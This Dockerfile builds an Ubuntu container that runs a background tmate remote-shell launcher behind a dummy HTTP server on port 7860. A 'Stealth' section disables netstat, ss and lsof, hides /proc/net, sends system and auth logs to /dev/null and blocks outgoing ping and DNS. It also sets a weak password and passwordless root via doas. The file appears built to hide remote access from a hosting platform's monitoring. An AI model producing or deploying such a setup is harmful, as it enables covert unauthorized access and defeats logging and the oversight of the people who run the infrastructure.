FROM ubuntu:22.04

ENV DEBIAN_FRONTEND=noninteractive
ENV LANG=en_US.UTF-8
ENV LANGUAGE=en_US:en
ENV LC_ALL=en_US.UTF-8

# Update and install packages
RUN apt update && apt upgrade -y && \
    apt install -y \
    curl wget git gnupg openssh-client \
    neofetch tmate python3 python3-pip \
    ca-certificates software-properties-common \
    build-essential procps xz-utils net-tools \
    make ffmpeg nano vim htop unzip zip \
    iputils-ping tree lsof netcat tmux \
    locales cmake iptables && \
    locale-gen en_US.UTF-8 && \
    apt clean && rm -rf /var/lib/apt/lists/* && \
    apt update && apt install -y doas

# Install Node.js 22 and npm
RUN curl -fsSL https://deb.nodesource.com/setup_22.x | bash - && \
    apt install -y nodejs && npm install -g npm

# Install speedtest-cli
RUN pip3 install speedtest-cli

# Create user 'draco' with UID 1000 and secure config
RUN useradd -m -s /bin/bash draco && \
    echo "draco:draco" | chpasswd && \
    usermod -u 1000 draco && \
    echo "permit nopass draco" > /etc/doas.conf && \
    echo "alias sudo='doas'" >> /home/draco/.bashrc

# SSH key generation
RUN mkdir -p /home/draco/.ssh && \
    ssh-keygen -t rsa -f /home/draco/.ssh/id_rsa -N '' && \
    chown -R draco:draco /home/draco/.ssh

# Stealth: block network info commands + DNS logs
RUN chmod -x /bin/netstat /usr/bin/ss /usr/bin/lsof || true && \
    chmod -r /proc/net || true && \
    echo 'hosts: files dns' > /etc/nsswitch.conf && \
    echo '127.0.0.1 localhost' > /etc/hosts && \
    ln -sf /dev/null /var/log/syslog && \
    ln -sf /dev/null /var/log/auth.log && \
    ln -sf /dev/null /var/log/messages && \
    iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP && \
    iptables -A OUTPUT -p udp --dport 53 -j DROP || true

# Copy stealth tmate launcher
COPY run_tmate.sh /home/draco/run_tmate.sh
RUN chmod +x /home/draco/run_tmate.sh && \
    touch /home/draco/.tmate_hidden.txt && \
    chmod 600 /home/draco/.tmate_hidden.txt && \
    chown draco:draco /home/draco/run_tmate.sh /home/draco/.tmate_hidden.txt

# Set working user and directory
USER draco
WORKDIR /home/draco

# Expose a dummy port (optional)
EXPOSE 7860

# Stealth run: launch tmate quietly in background + dummy http
CMD bash -c "./run_tmate.sh & python3 -m http.server 7860 > /dev/null 2>&1"